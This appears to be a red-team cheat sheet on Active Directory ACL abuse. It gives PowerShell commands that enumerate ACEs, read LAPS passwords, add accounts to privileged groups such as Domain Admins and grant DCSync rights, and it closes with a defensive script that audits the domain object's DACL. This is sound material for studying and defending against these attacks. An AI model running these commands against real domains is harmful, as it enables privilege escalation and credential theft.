ACL Abuse

Enumeration

ADModule
# Import the module straight from the DLL and manifest (no RSAT install needed)
Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\ADModule\ActiveDirectory\ActiveDirectory.psd1
# Get the DistinguishedName of the user
Get-ADUser -Identity USER
# List the ACEs on that user object via the AD: PSDrive
(Get-Acl 'AD:\CN=USER,CN=Users,DC=it,DC=gcb,DC=local').Access

PowerView_Dev
# Find ACEs that grant modification rights to non-default principals; resolve rights GUIDs to names
Find-InterestingDomainACL -ResolveGUIDs

PowerView
Invoke-ACLScanner -ResolveGUIDs

ReadProperty, ExtendedRight over OU / Computer Object

This usually indicates LAPS: the principal in IdentityReferenceName can read the cleartext LAPS password of the computers in that OU.

LAPS Module
# Import the LAPS PowerShell module
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1
# Find which principals hold the extended right to read LAPS passwords in the OU
Find-AdmPwdExtendedRights -Identity <OU>
# With a principal that holds that right, read the password of a given computer
Get-AdmPwdPassword -ComputerName <targetmachine>

WriteProperty | Self-Membership | GenericAll over Group

The principal can add members to the group.

ADModule
# Add a member to the group
Add-ADGroupMember -Identity "LocalAdmins" -Members USERS
# Check the membership
Get-ADGroupMember -Identity "LocalAdmins"

PowerView_dev
# Add a member to the group
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'

GenericWrite | GenericAll | WriteProperty over Computer Object

The principal can configure resource-based constrained delegation (RBCD) on the computer object.

GenericAll over User Object

The principal can reset the user's password without knowing the current one.

WriteDACL over DC

The principal can grant a user DCSync (directory replication) rights on the domain object.

RACE
# Grant the DCSync extended rights on the domain object to the given account
Set-ADACL -SamAccountName DOMAIN\USER -DistinguishedName 'DC=techcorp,DC=local' -GUIDRight DCSync -Server techcorp.local -Verbose
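Because a single added ACE on the domain head is enough to grant DCSync, defenders should audit that DACL regularly. The script below is an added example, not part of the original page or of RACE; it assumes the ActiveDirectory RSAT module is available and that the account running it can read the domain object. It resolves extended-right GUIDs from the schema and flags any principal outside a baseline list that holds replication rights, GenericAll, WriteDacl or WriteOwner.

```powershell
# Audit the domain object's DACL for principals able to DCSync or rewrite the DACL.
# Assumes the ActiveDirectory RSAT module is installed.
Import-Module ActiveDirectory

$rootDse  = Get-ADRootDSE
$domainDn = $rootDse.defaultNamingContext

# Map extended-right GUIDs to display names using the schema's Extended-Rights container
$rightsByGuid = @{}
Get-ADObject -SearchBase "CN=Extended-Rights,$($rootDse.configurationNamingContext)" `
    -LDAPFilter '(objectClass=controlAccessRight)' -Properties rightsGuid, displayName |
    ForEach-Object { $rightsByGuid[[guid]$_.rightsGuid] = $_.displayName }

$replicationRights = @('DS-Replication-Get-Changes', 'DS-Replication-Get-Changes-All',
                       'DS-Replication-Get-Changes-In-Filtered-Set')
# Baseline of principals expected to hold these rights; extend it after review for
# known exceptions in your environment (for example a directory sync service account)
$baseline = @('SYSTEM', 'Administrators', 'Domain Admins', 'Enterprise Admins',
              'Domain Controllers', 'ENTERPRISE DOMAIN CONTROLLERS',
              'Enterprise Read-only Domain Controllers')

$findings = foreach ($ace in (Get-Acl -Path "AD:\$domainDn").Access) {
    if ($ace.AccessControlType -ne 'Allow') { continue }
    $who = ($ace.IdentityReference.Value -split '\\')[-1]
    if ($baseline -contains $who) { continue }

    $rights = $ace.ActiveDirectoryRights.ToString()
    $reason = $null
    if ($rights -match 'GenericAll|WriteDacl|WriteOwner') {
        $reason = "Can rewrite the DACL or owner: $rights"
    } elseif ($rights -match 'ExtendedRight') {
        # An empty ObjectType GUID means every extended right, replication included
        $name = if ($ace.ObjectType -eq [guid]::Empty) { 'All extended rights' }
                else { $rightsByGuid[$ace.ObjectType] }
        if ($name -eq 'All extended rights' -or $replicationRights -contains $name) {
            $reason = "Holds $name"
        }
    }
    if ($reason) {
        [pscustomobject]@{ Principal = $ace.IdentityReference.Value
                           Inherited = $ace.IsInherited
                           Reason    = $reason }
    }
}

if ($findings) { $findings | Format-Table -AutoSize }
else { "No unexpected DCSync or WriteDacl holders on $domainDn" }
```

Run it from a scheduled task and diff the output against the previous run; a newly listed principal is the artifact the Set-ADACL command above leaves behind.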
